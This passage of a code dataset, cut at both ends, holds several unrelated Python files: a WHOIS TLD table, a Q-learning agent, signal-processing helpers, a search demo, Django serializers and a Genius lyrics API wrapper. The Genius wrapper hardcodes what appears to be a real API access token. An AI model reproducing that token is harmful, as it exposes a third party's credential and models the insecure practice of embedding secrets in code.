iana\nZZ[\"yahoo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"yandex\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"zero\"] = {\"_privateRegistry\": True} # no whois server found in iana\n\nZZ[\"onion\"] = {\"_privateRegistry\": True} # this is a special case https://tools.ietf.org/html/rfc7686\n\n# unknown tld abb, abb, abb, abb, whois.nic.abb,\n# unknown tld arpa, arpa, arpa, arpa, whois.iana.org,\n# unknown tld bn, bn, bn, bn, whois.bnnic.bn,\n# unknown tld bw, bw, bw, bw, whois.nic.net.bw,\n# unknown tld crown, crown, crown, crown, whois.nic.crown,\n# unknown tld crs, crs, crs, crs, whois.nic.crs,\n# unknown tld fj, fj, fj, fj, www.whois.fj,\n# unknown tld gp, gp, gp, gp, whois.nic.gp,\n# unknown tld hm, hm, hm, hm, whois.registry.hm,\n# unknown tld il, il, il, il, whois.isoc.org.il,\n# unknown tld int, int, int, int, whois.iana.org,\n# unknown tld iq, iq, iq, iq, whois.cmc.iq,\n# unknown tld mm, mm, mm, mm, whois.registry.gov.mm,\n# unknown tld mw, mw, mw, mw, whois.nic.mw,\n# unknown tld pf, pf, pf, pf, whois.registry.pf,\n# unknown tld post, post, post, post, whois.dotpostregistry.net,\n# unknown tld realtor, realtor, realtor, realtor, whois.nic.realtor,\n# unknown tld weir, weir, weir, weir, whois.nic.weir,\n# unknown tld xn--4dbrk0ce, ישראל, ישראל, ישראל, whois.isoc.org.il,\n# unknown tld xn--55qw42g, 公益, 公益, 公益, whois.conac.cn,\n# unknown tld xn--80ao21a, қаз, қаз, қаз, whois.nic.kz,\n# unknown tld xn--90a3ac, срб, срб, срб, whois.rnids.rs,\n# unknown tld xn--90ae, бг, бг, бг, whois.imena.bg,\n# unknown tld xn--90ais, бел, бел, бел, whois.cctld.by,\n# unknown tld xn--d1acj3b, дети, дети, дети, whois.nic.xn--d1acj3b,\n# unknown tld xn--j1amh, укр, укр, укр, whois.dotukr.com,\n# unknown tld xn--lgbbat1ad8j, الجزائر, الجزائر, الجزائر, whois.nic.dz,\n# unknown tld xn--mgba3a4f16a, ایران, ایران, ایران, whois.nic.ir,\n# unknown tld xn--mgbaam7a8h, امارات, امارات, امارات, whois.aeda.net.ae,\n# unknown tld xn--mgberp4a5d4ar, السعودية, السعودية, السعودية, whois.nic.net.sa,\n# unknown tld xn--mgbtx2b, عراق, عراق, عراق, whois.cmc.iq,\n# unknown tld xn--mgbx4cd0ab, مليسيا, مليسيا, مليسيا, whois.mynic.my,\n# unknown tld xn--node, გე, გე, გე, whois.itdc.ge,\n# unknown tld xn--pgbs0dh, تونس, تونس, تونس, whois.ati.tn,\n# unknown tld xn--q7ce6a, ລາວ, ລາວ, ລາວ, whois.nic.la,\n# unknown tld xn--y9a3aq, հայ, հայ, հայ, whois.amnic.net,\n# unknown tld xn--ygbi2ammx, فلسطين, فلسطين, فلسطين, whois.pnina.ps,\n# unknown tld xn--zfr164b, 政务, 政务, 政务, whois.conac.cn,\n","repo_name":"DannyCork/python-whois","sub_path":"whois/tldDb/tld_regexpr.py","file_name":"tld_regexpr.py","file_ext":"py","file_size_in_byte":161584,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"2"} +{"seq_id":"33546955408","text":"import webbrowser\n\n\ndef searchGoogle(searchQuery):\n '''\n searchGoogle - Search for user input in google\n\n Args:\n searchQuery (string): What user wants to search in google\n ''' \n\n edge_path=\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\"\n webbrowser.register('edge', None, webbrowser.BackgroundBrowser(edge_path))\n\n searchQuery = str(searchQuery)\n searchString = searchQuery.replace(' ', '+')\n\n url = f\"https://www.google.com/search?q={searchString}\"\n\n # Example url = \"https://www.google.com/search?q=birds+in+australia\"\n\n webbrowser.get('edge').open(f\"{url}\")","repo_name":"SuprakashB/Lucy","sub_path":"web/searchGoogle.py","file_name":"searchGoogle.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7754027508","text":"import numpy as np\nimport gym\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm as tqdm\nfrom PIL import Image, ImageDraw, ImageFont\nfrom random import sample\n\nclass TabularQAgent:\n # Setting things up\n def __init__(self, env, eps=0.2, gamma = 1):\n self.noStates = env.observation_space.n\n self.noActions = env.action_space.n\n self.env = env\n self.Q = np.zeros((self.noStates, self.noActions))\n self.eps = eps\n self.gamma = gamma\n self.updates = 0\n \n def reset(self):\n self.Q = np.zeros((self.noStates, self.noActions))\n \n # Function to do eps-greedy exploration\n def select_action(self, greedy=False):\n if(greedy):\n return np.argmax(self.Q[self.env.state, :])\n \n thresh = np.random.rand()\n if(thresh < self.eps): # Explore\n return self.env.action_space.sample()\n else: # Exploit\n greedy_actions = np.where(self.Q[self.env.state, :]==np.amax(self.Q[self.env.state, :]))\n return np.random.choice(greedy_actions[0])\n \n # Function for SARSA policy updates\n# def updatePolicySARSA(self, S, A, R, S2, A2, alpha):\n# self.updates = self.updates + 1\n# self.Q[S,A] = self.Q[S,A] + alpha * (R + self.gamma * self.Q[S2, A2] - self.Q[S,A])\n \n # Function for Qlearning policy updates\n def update(self, S, A, R, S2, lr=0.1):\n self.updates = self.updates + 1\n self.Q[S,A] = self.Q[S,A] + lr * (R + self.gamma * np.max(self.Q[S2, :]) - self.Q[S,A])\n \n def train(self, no_episodes=200, horizon=1000, lr=0.1, track=True):\n self.reset()\n R_vec = []\n ts = 0\n \n for i in tqdm(range(no_episodes), leave=True):\n state = self.env.reset()\n for t in range(horizon):\n action = self.select_action()\n state2, r, done, _ = self.env.step(action)\n ts += 1\n self.update(state, action, r, state2)\n if(track):\n R_vec.append(r)\n if(done):\n break\n state = state2\n\n return R_vec, self.Q, ts\n \n def train_multiple_ts(self, runs=5, max_ts=20000, horizon=1000, lr=0.1, track=True):\n \"\"\"\n This function trains the agent on the environment multiple times. The stopping\n criterion is number of timesteps.\n \"\"\"\n R_mat = []; Q_vec=[]\n for j in range(runs):\n R_vec = []\n self.reset()\n ts = 0\n state = self.env.reset()\n for i in tqdm(range(max_ts), leave=True):\n action = self.select_action()\n state2, r, done, _ = self.env.step(action)\n self.update(state, action, r, state2)\n if(track):\n R_vec.append(r)\n\n if(done):\n state = self.env.reset()\n continue\n\n state = state2\n\n R_mat.append(R_vec)\n Q_vec.append(self.Q)\n\n return R_mat, Q_vec","repo_name":"psurya1994/fun","sub_path":"agents_tabular/tabularQAgent.py","file_name":"tabularQAgent.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"13554439716","text":"#!/usr/bin/env python\n\n\"\"\"\nSignal Processing Extras\n========================\n\nThis module contains various signal processing tools and\nalgorithms that are not currently in scipy.signal.\n\nError Analysis Routines\n-----------------------\n- db Convert a power value to decibels.\n- rms Compute the root mean squared value of an array.\n- snr Compute the signal-to-noise ratio of two signals.\n\nFiltering Routines\n------------------\n- downsample Downsample an array.\n- fftfilt Apply an FIR filter to a signal using the overlap-add method.\n- remezord Determine filter parameters for Remez algorithm.\n- upsample Upsample an array.\n\nMiscellaneous Routines\n----------------------\n- nextpow2 Return n such that 2**n >= abs(x).\n- oddceil Return the smallest odd integer no less than x.\n- oddround Return the nearest odd integer nearest to x.\n\n\"\"\"\n\n__all__ = ['db', 'downsample', 'fftfilt', 'nextpow2', 'oddceil', 'oddround',\n 'remezord', 'rms', 'snr', 'upsample']\n\nfrom numpy import abs, arange, arctan, argmin, asarray, ceil, floor, \\\n hstack, int, log10, log2, max, mean, min, mod, pi, shape, \\\n sqrt, zeros\n\n# Since the fft function in scipy is faster than that in numpy, try to\n# import the former before falling back to the latter:\ntry:\n from scipy.fftpack import fft, ifft\nexcept ImportError:\n from numpy.fft import fft, ifft\n\n# --- Error analysis functions ---\n\ndef db(x):\n \"\"\"Convert the specified power value to decibels assuming a\n reference value of 1.\"\"\"\n\n return 10*log10(x)\n\ndef rms(x):\n \"\"\"Compute the root mean squared value of the specified array x.\"\"\"\n\n return sqrt(mean(abs(x)**2))\n\ndef snr(u, u_rec, k_min=0, k_max=None):\n \"\"\"Compute the signal-to-noise ratio (in dB) of a signal given its\n reconstruction.\n\n Parameters\n ----------\n u : numpy array of floats\n Original signal.\n u_rec : numpy array of floats\n Reconstructed signal.\n k_min : int\n Lower index into the signal over which to compute the SNR.\n k_max : int\n Upper index into the signal over which to compute the SNR.\n\n \"\"\"\n\n if len(u) != len(u_rec):\n raise ValueError('u and u_rec must be the same length')\n\n return db(mean(u[k_min:k_max]**2))-db(mean((u[k_min:k_max]-u_rec[k_min:k_max])**2))\n\n# --- Sampling functions ---\n\ndef upsample(x, n, offset=0):\n \"\"\"Upsample a vector x by inserting n-1 zeros between every\n entry. An optional offset may be specified.\"\"\"\n\n if len(shape(x)) > 1:\n raise ValueError('x must be a vector')\n y = zeros(len(x)*n, asarray(x).dtype)\n y[offset::n] = x\n return y\n\ndef downsample(x, n, offset=0):\n \"\"\"Downsample a vector x by returning every nth entry. An optional\n offset may be specified.\"\"\"\n\n if len(shape(x)) > 1:\n raise ValueError('x must be a vector')\n return x[offset::n]\n\n# --- Filtering functions ---\n\ndef nextpow2(x):\n \"\"\"Return the first integer N such that 2**N >= abs(x)\"\"\"\n\n return ceil(log2(abs(x)))\n\ndef fftfilt(b, x, *n):\n \"\"\"Filter the signal x with the FIR filter described by the\n coefficients in b using the overlap-add method. If the FFT\n length n is not specified, it and the overlap-add block length\n are selected so as to minimize the computational cost of\n the filtering operation.\"\"\"\n\n N_x = len(x)\n N_b = len(b)\n\n # Determine the FFT length to use:\n if len(n):\n\n # Use the specified FFT length (rounded up to the nearest\n # power of 2), provided that it is no less than the filter\n # length:\n n = n[0]\n if n != int(n) or n <= 0:\n raise ValueError('n must be a nonnegative integer')\n if n < N_b:\n n = N_b\n N_fft = 2**nextpow2(n)\n else:\n\n if N_x > N_b:\n\n # When the filter length is smaller than the signal,\n # choose the FFT length and block size that minimize the\n # FLOPS cost. Since the cost for a length-N FFT is\n # (N/2)*log2(N) and the filtering operation of each block\n # involves 2 FFT operations and N multiplications, the\n # cost of the overlap-add method for 1 length-N block is\n # N*(1+log2(N)). For the sake of efficiency, only FFT\n # lengths that are powers of 2 are considered:\n N = 2**arange(ceil(log2(N_b)), floor(log2(N_x)))\n cost = ceil(N_x/(N-N_b+1))*N*(log2(N)+1)\n N_fft = N[argmin(cost)]\n\n else:\n\n # When the filter length is at least as long as the signal,\n # filter the signal using a single block:\n N_fft = 2**nextpow2(N_b+N_x-1)\n\n N_fft = int(N_fft)\n\n # Compute the block length:\n L = int(N_fft - N_b + 1)\n\n # Compute the transform of the filter:\n H = fft(b, N_fft)\n\n y = zeros(N_x,float)\n i = 0\n while i <= N_x:\n il = min([i+L,N_x])\n k = min([i+N_fft,N_x])\n yt = ifft(fft(x[i:il],N_fft)*H,N_fft) # Overlap..\n y[i:k] = y[i:k] + yt[:k-i] # and add\n i += L\n return y\n\ndef oddround(x):\n \"\"\"Return the nearest odd integer from x.\"\"\"\n\n return x-mod(x,2)+1\n\ndef oddceil(x):\n \"\"\"Return the smallest odd integer no less than x.\"\"\"\n\n return oddround(x+1)\n\ndef remlplen_herrmann(fp, fs, dp, ds):\n \"\"\"Determine the length of the low pass filter with passband frequency\n fp, stopband frequency fs, passband ripple dp, and stopband ripple ds.\n fp and fs must be normalized with respect to the sampling frequency.\n Note that the filter order is one less than the filter length.\n\n References\n ----------\n O. Herrmann, L.R. Raviner, and D.S.K. Chan, Practical Design Rules for\n Optimum Finite Impulse Response Low-Pass Digital Filters, Bell Syst. Tech.\n Jour., 52(6):769-799, Jul./Aug. 1973.\n\n \"\"\"\n\n dF = fs-fp\n a = [5.309e-3,7.114e-2,-4.761e-1,-2.66e-3,-5.941e-1,-4.278e-1]\n b = [11.01217, 0.51244]\n Dinf = log10(ds)*(a[0]*log10(dp)**2+a[1]*log10(dp)+a[2])+ \\\n a[3]*log10(dp)**2+a[4]*log10(dp)+a[5]\n f = b[0]+b[1]*(log10(dp)-log10(ds))\n N1 = Dinf/dF-f*dF+1\n\n return int(oddround(N1))\n\ndef remlplen_kaiser(fp, fs, dp, ds):\n \"\"\"Determine the length of the low pass filter with passband frequency\n fp, stopband frequency fs, passband ripple dp, and stopband ripple ds.\n fp and fs must be normalized with respect to the sampling frequency.\n Note that the filter order is one less than the filter length.\n\n References\n ----------\n J.F. Kaiser, Nonrecursive Digital Filter Design Using I_0-sinh Window\n function, Proc. IEEE Int. Symp. Circuits and Systems, 20-23, April 1974.\n\n \"\"\"\n\n dF = fs-fp\n N2 = (-20*log10(sqrt(dp*ds))-13.0)/(14.6*dF)+1.0\n\n return int(oddceil(N2))\n\ndef remlplen_ichige(fp, fs, dp, ds):\n \"\"\"Determine the length of the low pass filter with passband frequency\n fp, stopband frequency fs, passband ripple dp, and stopband ripple ds.\n fp and fs must be normalized with respect to the sampling frequency.\n Note that the filter order is one less than the filter length.\n\n References\n ----------\n K. Ichige, M. Iwaki, and R. Ishii, Accurate Estimation of Minimum\n Filter Length for Optimum FIR Digital Filters, IEEE Transactions on\n Circuits and Systems, 47(10):1008-1017, October 2000.\n\n \"\"\"\n \n dF = fs-fp\n v = lambda dF,dp:2.325*((-log10(dp))**-0.445)*dF**(-1.39)\n g = lambda fp,dF,d:(2.0/pi)*arctan(v(dF,dp)*(1.0/fp-1.0/(0.5-dF)))\n h = lambda fp,dF,c:(2.0/pi)*arctan((c/dF)*(1.0/fp-1.0/(0.5-dF)))\n Nc = ceil(1.0+(1.101/dF)*(-log10(2.0*dp))**1.1)\n Nm = (0.52/dF)*log10(dp/ds)*(-log10(dp))**0.17\n N3 = ceil(Nc*(g(fp,dF,dp)+g(0.5-dF-fp,dF,dp)+1.0)/3.0)\n DN = ceil(Nm*(h(fp,dF,1.1)-(h(0.5-dF-fp,dF,0.29)-1.0)/2.0))\n N4 = N3+DN\n\n return int(N4)\n\ndef remezord(freqs, amps, rips, Hz=1, alg='ichige'):\n \"\"\"Calculate the parameters required by the Remez exchange algorithm to\n construct a finite impulse response (FIR) filter that approximately\n meets the specified design.\n\n Parameters\n ----------\n freqs : array_like of floats\n A monotonic sequence of band edges specified in Hertz. All\n elements must be non-negative and less than 1/2 the\n sampling frequency as given by the Hz parameter.\n amps : array_like of floats\n A sequence containing the amplitudes of the signal to be\n filtered over the various bands.\n rips : array_like of floats\n A sequence specifying the maximum ripples of each band.\n alg : {'herrmann', 'kaiser', 'ichige'}\n Filter length approximation algorithm.\n\n Returns\n -------\n numtaps : int\n Desired number of filter taps.\n bands : ndarray of floats\n A monotonic sequence containing the band edges.\n amps : ndarray of floats\n Desired gain for each band region.\n weights : ndarray of floats\n Filter design weights.\n\n See Also\n --------\n scipy.signal.remez\n\n \"\"\"\n\n # Make sure the parameters are floating point numpy arrays:\n freqs = asarray(freqs, 'd')\n amps = asarray(amps, 'd')\n rips = asarray(rips, 'd')\n\n # Scale ripples with respect to band amplitudes:\n rips /= (amps+(amps==0.0))\n\n # Normalize input frequencies with respect to sampling frequency:\n freqs /= Hz\n\n # Select filter length approximation algorithm:\n if alg == 'herrmann':\n remlplen = remlplen_herrmann\n elif alg == 'kaiser':\n remlplen = remlplen_kaiser\n elif alg == 'ichige':\n remlplen = remlplen_ichige\n else:\n raise ValueError('Unknown filter length approximation algorithm.')\n\n # Validate inputs:\n if any(freqs > 0.5):\n raise ValueError('Frequency band edges must not exceed the Nyquist frequency.')\n if any(freqs < 0.0):\n raise ValueError('Frequency band edges must be nonnegative.')\n if any(rips < 0.0):\n raise ValueError('Ripples must be nonnegative.')\n if len(amps) != len(rips):\n raise ValueError('Number of amplitudes must equal number of ripples.')\n if len(freqs) != 2*(len(amps)-1):\n raise ValueError('Number of band edges must equal 2*((number of amplitudes)-1)')\n\n # Find the longest filter length needed to implement any of the\n # low-pass or high-pass filters with the specified edges:\n f1 = freqs[0:-1:2]\n f2 = freqs[1::2]\n L = 0\n for i in range(len(amps)-1):\n L = max((L,\n remlplen(f1[i], f2[i], rips[i], rips[i+1]),\n remlplen(0.5-f2[i], 0.5-f1[i], rips[i+1], rips[i])))\n\n # Cap the sequence of band edges with the limits of the digital frequency\n # range:\n bands = hstack((0.0, freqs, 0.5))\n\n # The filter design weights correspond to the ratios between the maximum\n # ripple and all of the other ripples:\n weight = max(rips)/rips\n\n return [L, bands, amps, weight]\n","repo_name":"bionet/ted.python","sub_path":"bionet/utils/signal_extras.py","file_name":"signal_extras.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"31433102214","text":"\n#هذا الكود يقوم بتنفيذ خوارزمية البحث أولاً أفضل (UCS - Uniform Cost Search) على رسم بياني \n# (graph) للعثور على أقل تكلفة للوصول من النقطة البدء (start) إلى الهدف (goal).\ngraph = {\n 'S': [('A', 1), ('B', 4)],\n 'A': [('B', 2), ('C', 5), ('G', 12)],\n 'B': [('C', 2)],\n 'C': [('G', 3)],\n 'G': []\n}\ndef path_cost(path):\n total_cost = sum(cost for _, cost in path)\n return total_cost, path[-1][0]\n\ndef UCS(graph, start, goal):\n visited = set()\n queue = [[(start, 0)]]\n while queue:\n queue.sort(key=path_cost)\n path = queue.pop(0)\n node = path[-1][0]\n if node in visited:\n continue\n visited.add(node)\n if node == goal:\n return path\n else:\n adjacent_nodes = graph.get(node, [])\n for (node2, cost) in adjacent_nodes:\n new_path = path + [(node2, cost)]\n queue.append(new_path)\n return None\nsolution = UCS(graph, 'S', 'G')\nif solution:\n print('Solution is', solution)\n print('Cost of Solution is', path_cost(solution)[0])\nelse:\n print('No solution found.')","repo_name":"Abdalrhmanal/Examples_of_artificial_intelligence_principles","sub_path":"UFCS.py","file_name":"UFCS.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"3247537935","text":"''' Module that focuses on extracting contextual data from the genius website to be used on our webpage'''\nimport requests\nimport time\nimport json\n\nclass genius:\n\n def __init__(self):\n self.baseUrl=\"https://api.genius.com\"\n self.CLIENT_ACCESS_TOKEN=\"YT_ZO2npD-RqvQOm9PJQhUXhY0b1Shnht3QqPAIXflUeuTy8_s5OCEdEMSgmfRaY\"\n self.headers={}\n self.artistPath=\"\"\n self.blurb=\"\"\n self.artistTwitter=\"\"\n self.artistInsta=\"\"\n self.artistFb=\"\"\n self.artistImg = \"\"\n self.artistDescription=\"\"\n\n\n def getJson(self,path,params=None,headers=None):\n\n #Joins the base URL with the inputted path\n url=\"/\".join([self.baseUrl,path])\n\n print(url)\n\n #Sets the bearer field with the client access token\n token=\"Bearer {}\".format(self.CLIENT_ACCESS_TOKEN)\n\n #Checks for authorization\n if self.headers:\n self.headers[\"Authorization\"]=token\n else:\n self.headers={\"Authorization\":token}\n\n # Gets repsonse from the path to the data\n response=requests.get(url=url,params=params,headers=self.headers)\n response.raise_for_status()\n\n return response.json()\n\n def getArtistInfo(self,song):\n\n #Builds the path for the search method\n basePath=\"search?q=\"\n queryPath=basePath+song\n\n #Gets the JSON response of the search result\n songInfo=self.getJson(queryPath)\n self.artistPath=songInfo[\"response\"][\"hits\"][0][\"result\"][\"primary_artist\"][\"api_path\"]\n id=songInfo[\"response\"][\"hits\"][0][\"result\"][\"id\"]\n print(self.artistPath)\n\n #Gets the artist information\n self.getArtist(self.artistPath)\n\n\n self.getSong(id)\n\n '''print(self.blurb)\n print(self.artistFb)\n print(self.artistTwitter)\n print(self.artistInsta)\n print(self.artistDescription)\n print(self.artistImg)'''\n\n return self.blurb,self.artistFb,self.artistTwitter,self.artistInsta,self.artistImg,self.artistDescription\n\n\n #Gets the annotation from the chosen song\n def getSong(self,id):\n songPath=\"songs/{}\".format(id)\n self.blurb=self.getJson(songPath)[\"response\"][\"song\"][\"description\"][\"dom\"][\"children\"][0][\"children\"][0]\n\n #Gets artist information\n def getArtist(self,artistPath):\n\n #Gets the response body from the artist path\n artistData=self.getJson(artistPath[1:])[\"response\"][\"artist\"]\n self.artistFb=\"https://www.facebook.com/{}\".format(artistData[\"facebook_name\"])\n self.artistTwitter = \"https://www.twitter.com/{}\".format(artistData[\"twitter_name\"])\n self.artistInsta = \"https://www.instagram.com/{}\".format(artistData[\"instagram_name\"])\n self.artistImg=artistData[\"image_url\"]\n self.description= artistData[\"description\"][\"dom\"][\"children\"][0][\"children\"][0]\n\n\n\n def getAnnotations(self,id):\n print(self.getJson(id))\n return\n\n\n\n\n\nif __name__==\"__main__\":\n\n #Remember to make the search query a combination of the song name and the artists name\n GeniusLoader=genius()\n songs=[\"Yellow Coldplay\",\"Thats what I like\",\"Broke Lecrae\",\"Love me now John Legend\"]\n\n for song in songs:\n GeniusLoader.getArtistInfo(song)","repo_name":"ryanluu12345/music-flyer","sub_path":"genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"27251037304","text":"from .models import *\nfrom rest_framework import serializers\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name=\"staff:user-detail\")\n\n class Meta:\n model = User\n fields = ('url', 'first_name', 'last_name', 'is_staff', 'is_active', 'email')\n\n\nclass InstitutionSerializer(serializers.HyperlinkedModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name=\"staff:institution-detail\")\n\n class Meta:\n model = Institution\n fields = '__all__'\n\n\nclass ProvinceSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Province\n fields = ('id', 'name',)\n\n\nclass TargetSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = Target\n fields = ('url', 'name',)\n\n\nclass ItemSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = Item\n fields = '__all__'\n","repo_name":"tomeksporczyk/Oddam_w_dobre_rece","sub_path":"staff/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20232162790","text":"# https://leetcode.com/problems/reconstruct-itinerary/submissions/\nfrom typing import List\nfrom collections import defaultdict\nfrom queue import PriorityQueue\n\nclass ReconstructItinerary():\n def findItinerary(self, tickets: List[List[str]], root='JFK') -> List[str]:\n self.map = defaultdict(lambda: PriorityQueue())\n self.flight_list = [root]\n self.conver_to_map(tickets)\n self.get_flight_list()\n return self.flight_list\n\n def conver_to_map(self, tickets):\n for from_airport, to_airport in tickets:\n self.map[from_airport].put(to_airport)\n\n def get_flight_list(self):\n next_que = self.map[self.flight_list[0]]\n while not next_que.empty():\n next_airport = next_que.get()\n self.flight_list.append(next_airport)\n next_que = self.map[next_airport]\n","repo_name":"nanvenomous/dataStructuresAlgorithms","sub_path":"python/leetcode/reconstruct_itinerary/reconstruct_itinerary.py","file_name":"reconstruct_itinerary.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"10278893968","text":"import pandas as pd\nimport copy\nimport math\nimport random\nimport numpy as np\n\ndef makeQuery(edges_df, query_list, thresh=20):\n subset_df = edges_df[edges_df[\"source\"].isin(query_list) | edges_df[\"target\"].isin(query_list)]\n subset_df = subset_df[subset_df[\"thickness\"]>thresh]\n return subset_df\n\n\ndef filter_nodes(full_df, prev_query, max_nodes=100):\n all_nodes = full_df[\"target\"].tolist() + full_df[\"source\"].tolist()\n all_thickness = (full_df[\"thickness\"].tolist()) * 2\n ranked_df = pd.DataFrame.from_dict({\"node\":all_nodes, \"thickness\":all_thickness})\n ranked_df = ranked_df[~ranked_df[\"node\"].isin(prev_query)] #Remove already-found nodes\n ranked_df = ranked_df.groupby(['node']).agg(max).sort_values(by = 'thickness', ascending=False) #Get maximum thickness edge that node has\n if len(ranked_df.index) > max_nodes: \n passing_nodes = (ranked_df.index.tolist())[:max_nodes] \n #Keep only top X nodes\n full_df = full_df[(full_df[\"source\"].isin(prev_query) & (full_df[\"target\"].isin(passing_nodes) | full_df[\"target\"].isin(prev_query))) | (full_df[\"source\"].isin(passing_nodes) & (full_df[\"target\"].isin(prev_query)))]\n return full_df\n\n\ndef query(G, edges_df, nodes_df, db_df, q, depth):\n user_query = list(q.keys())[0]\n \n # For name queries (accounts for the user selecting multiple IDs)\n if user_query != \"QUERY_ID\":\n query_list = list(q.values())\n query_list = [item for sublist in query_list for item in sublist]\n \n # For ID queries\n else:\n query_list = list(q.values())\n\n if depth==1:\n full_df = makeQuery(edges_df, query_list, thresh=0)\n full_df[\"depth\"]=1\n \n else:\n # Recursively find target nodes\n queried = [] #Already-queried nodes\n targets = copy.deepcopy(query_list)\n full_df_cols = list(edges_df.columns)\n full_df_cols.append(\"depth\")\n full_df = pd.DataFrame(columns = full_df_cols)\n for i in range(depth):\n query_df = makeQuery(edges_df, targets, thresh=20) #pre filter to avoid large networks\n queried.extend(targets)\n query_df[\"depth\"] = i+1\n nodes = np.union1d(query_df[\"target\"].tolist(), query_df[\"source\"].tolist())\n targets = np.setdiff1d(nodes, queried) #Get new nodes to use in the next query\n full_df = full_df.append(query_df)\n\n #Bidirectional edges\n opp_df = full_df.merge(edges_df, left_on=[\"source\", \"target\"], right_on=[\"target\",\"source\"])\n opp_df = opp_df.drop(labels=[\"source_x\",\"target_x\",\"color_x\", \"thickness_x\"], axis=1).rename(columns={\"source_y\":\"source\", \"target_y\":\"target\", \"color_y\":\"color\", \"thickness_y\":\"thickness\"})\n full_df = pd.concat([full_df, opp_df]).drop_duplicates(subset=[\"source\", \"target\"])\n \n # Make query nodes depth = 0, so they're in the center of the visualization\n df_dict = {\"target\":query_list, \"depth\":[0]*len(query_list)}\n zero_rows = pd.DataFrame.from_dict(df_dict)\n \n # Only need the targets, since every node (except for some query nodes) are a target at least once\n targets = full_df[[\"target\", \"depth\"]]\n nodes = zero_rows.append(targets)\n sources = full_df[[\"source\", \"depth\"]]\n sources = sources.rename(columns={'source': 'target'})\n nodes = nodes.append(sources)\n nodes = nodes.sort_values('depth').drop_duplicates('target').sort_index()\n nodes_df = nodes_df.drop_duplicates(subset='Id', keep=\"first\")\n nodes = pd.merge(nodes, nodes_df, left_on = \"target\", right_on = \"Id\", how=\"inner\")\n \n # Add synonyms to the nodes\n nodes = nodes.merge(db_df, left_on=\"Id\", right_on=\"id\", how=\"left\")\n nodes[\"name\"] = nodes[\"name\"].fillna(nodes[\"Label\"])\n nodes[\"id\"] = nodes[\"id\"].fillna(nodes[\"Id\"])\n nodes[\"name\"] = nodes[\"name\"].fillna(\"NAN\")\n syn_concat = lambda x: \"%%\".join(x) # Separate each synonym with %%\n \n aggregation_functions = {\n 'Id': 'first',\n 'Label':\"first\",\n \"depth\":\"first\",\n \"KB\":\"first\",\n \"PR\":\"first\",\n \"name\":syn_concat\n }\n \n nodes = nodes.groupby('id').aggregate(aggregation_functions)\n nodes[\"Type\"] = [\"Query\" if x in query_list else \"Direct\"\n for x in nodes['Id']]\n \n # If the user selected multiple IDs, merge them all into one node\n if user_query != \"QUERY_ID\":\n nodes.loc[(nodes.Id.isin(query_list)),'display_id'] = \", \".join(query_list)\n nodes[\"display_id\"] = nodes[\"display_id\"].fillna(nodes[\"Id\"])\n nodes.loc[(nodes.Id.isin(query_list)),'Label']=user_query\n nodes.loc[(nodes.Id.isin(query_list)),'Id']=user_query\n nodes = nodes.drop_duplicates(subset=\"Id\")\n full_df[\"orig_source\"] = full_df[\"source\"]\n full_df[\"orig_target\"] = full_df[\"target\"]\n full_df.loc[(full_df.source.isin(query_list)),'source']=user_query\n full_df.loc[(full_df.target.isin(query_list)),'target']=user_query\n \n else:\n nodes[\"display_id\"] = nodes[\"Id\"]\n full_df[\"orig_source\"] = full_df[\"source\"]\n full_df[\"orig_target\"] = full_df[\"target\"]\n \n syn_concat = lambda x: \"%%\".join(x)\n \n aggregation_functions = { \n \"depth\":\"first\",\n \"PR\":\"first\",\n \"Label\":\"first\",\n \"KB\":\"first\",\n \"display_id\":\"first\",\n \"Type\":\"first\",\n 'name': syn_concat\n }\n \n nodes = nodes.groupby(\"Id\").aggregate(aggregation_functions).reset_index()\n\n full_df = full_df[[\"color\", \"thickness\", \"source\", \"target\", \"orig_source\", \"orig_target\"]]\n full_df[\"color2\"] = full_df[\"color\"] * full_df[\"thickness\"]\n id_concat = lambda x: \"%%\".join(x) # Concat all source and target IDs of merged nodes\n aggregation_functions = {'color2': 'sum','thickness': 'sum', \"orig_source\":id_concat, \"orig_target\":id_concat}\n full_df = full_df.groupby([\"source\", \"target\"]).aggregate(aggregation_functions).reset_index()\n full_df[\"color\"] = full_df[\"color2\"]/full_df[\"thickness\"]\n \n def formatter(sources, targets):\n source_list = sources.split(\"%%\")\n target_list = targets.split(\"%%\")\n file_list = [f\"{source_list[i]}_{target_list[i]}.txt\" for i in range(len(source_list))]\n files = \"%%\".join(file_list)\n return files\n \n full_df[\"files\"] = full_df.apply(lambda x: formatter(x.orig_source, x.orig_target), axis=1)\n \n nodes = nodes[[\"Id\", \"Label\", \"depth\", \"KB\", \"display_id\", \"name\", \"Type\"]]\n full_df = full_df[[\"color\", \"thickness\", \n \"files\", \"source\", \"target\"]]\n full_df[\"source_DI\"] = full_df.merge(nodes, left_on=\"source\", right_on=\"Id\", how=\"left\")[\"display_id\"].tolist()\n full_df[\"target_DI\"] = full_df.merge(nodes, left_on=\"target\", right_on=\"Id\", how=\"left\")[\"display_id\"].tolist()\n 